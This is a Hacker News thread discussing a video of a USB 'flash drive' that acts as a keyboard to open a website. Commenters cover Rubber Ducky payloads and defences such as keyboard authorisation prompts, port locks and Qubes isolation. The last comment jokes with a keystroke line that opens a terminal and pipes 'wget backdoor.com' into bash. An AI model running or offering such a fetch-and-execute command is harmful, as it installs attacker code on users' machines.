
Thought it was a flash drive [video] - cgtyoder
https://www.reddit.com/r/assholedesign/comments/c1aq23/thought_it_was_a_flash_drive/
======
dijit
Hasn't this been known for half-a-decade?

I mean, it's a product you can literally buy and it's impossible to adequately
defend against.

[https://github.com/hak5darren/USB-Rubber-
Ducky/wiki/Payloads](https://github.com/hak5darren/USB-Rubber-
Ducky/wiki/Payloads)

[https://shop.hak5.org/products/usb-rubber-ducky-
deluxe](https://shop.hak5.org/products/usb-rubber-ducky-deluxe)

~~~
notatoad
i've known it was possible, but it's still the first time i'd ever seen a clip
of it actually happening.

And i'm pretty sure using this exploit for totally benign marketing purposes
is a new one.

------
codezero
Jeez, I thought these auto opening usb things were isolated to Windows and
only old versions. What’s the story with this on macOS?

~~~
makepanic
It's a USB keyboard that opens types some commands to open a hard-coded
website.

You can't really prevent that.

~~~
mikeash
You could require confirmation before accepting a new input device. This could
be done with out of band signaling (such as a button on the computer itself
that you push to say “yes, I want to use this keyboard”) or you could do it by
requiring the user to type in a secret (such as their login password, or even
just a PIN displayed on the screen) to enable it for other uses.

I don’t know that people would accept this inconvenience, though.

~~~
dijit
> or you could do it by requiring the user to type in a secret

how would you accomplish this given that the normal situation is that you're
plugging in a keyboard?

~~~
codezero
I think the implication is you can type on the plugged in keyboard, but the OS
won't pass the input through unless the first thing typed is a secret.

This is somewhat similar to how bluetooth keyboards are enabled on macOS (or
were the last time I connected one).

~~~
mikeash
Precisely. You get some authorization box and your input only goes to that
box. If you authorize, it then acts like a normal keyboard.

------
_bxg1
As has been pointed out, you couldn't block this kind of thing without
blocking USB keyboards altogether.

I wonder what it would look like to have a background program that would
detect and intercept any newly connected device by default, give it a fake
(VM?) environment, and log everything it tried to do to the screen while
prompting to ask if you want to let it into the "real" system. Obviously this
is what security professionals do manually, but I'm talking about a totally
transparent and automatic version that could be left running all the time.

~~~
fouronnes3
A simple system like android fine grained permissions? <usb device> is asking
to send keyboard input. Allow/Deny?

~~~
Wowfunhappy
This strikes me as the right solution, with two caveats:

• It should allow the keyboard through—or have a timeout that defaults to
"yes"—if a mouse or keyboard is not already connected.

• I should have the option to disable it.

~~~
Gaelan
If there's a monitor, you don't need to trust the first keyboard—just display
a message with "type this [random] code to allow this keyboard."

~~~
Wowfunhappy
I like this, but how do you know the keyboard layout?

~~~
sthgrau
My thought was that it would be an excellent, low knowledge way of figuring
that out. For example, if it said type "qwerty" and it came through as
"azerty", that would get you 95% of the way to having a fully functional
keyboard. Mapping out the requisite keys needed to fully identify the keys
could probably be done with a fairly short number of key presses for 99+% of
likely keyboards.

For this case, I am assuming that the keyboard and os language are fairly
compatible, at least translatable.

------
fencepost
There are a variety of physical port blockers available as well as devices to
lock cables in place. Some protrude, others are flush and require a key for
removal.

If you have business policies and training in place, hopefully the additional
steps of removing a lock will also provide time for adequate second thoughts
to percolate through those with poor judgment. Malicious actors won't be
seriously deterred, but that's a different matter.

------
snailmailman
Qubes OS has an interesting way of combatting these kinds of attacks. You can
manually attach a usb drive to a specific program VM, limiting the damage
possible by a malicious flash drive.

I want to say it even lets you disable or whitelist usb keyboards/mice
entirely but I’m not 100% certain.

QubesOS is pretty different from other OSes though, I wish those sorts of
device isolation were possible or more easily accomplished in other operating
systems.

------
NikolaeVarius
At Defcon, a buddy of mine screwed around with a bluetooth HID device, that
when connected to, would automatically attempt to open a webpage and send them
to an innocuous site (Which obviously could have been a less innocuous site).

Couldn't believe we got multiple people to connect to it under the guise the
device would do a cool thing.

~~~
swiley
Well it is a cool thing. It’s different and that makes it interesting.

Sometimes I feel like all this worrying about computer security makes it
harder for people to share new things.

~~~
lbotos
Uh, I think you are making an argument against _safety_ and i'm not sure if
you are being sarcastic?

It's one thing to theorize, discuss and build something dangerous, it's
another to actually use it.

See Flamethrowers.

~~~
swiley
Flamethrowers are a great analogy.

Adults who know each other and the dangers well should be (and are) allowed to
play with flamethrowers. I’m not sure I’d want to live in a place where they
couldn’t.

------
fouronnes3
so... <Super>terminal<Enter>wget backdoor.com | bash<Enter>

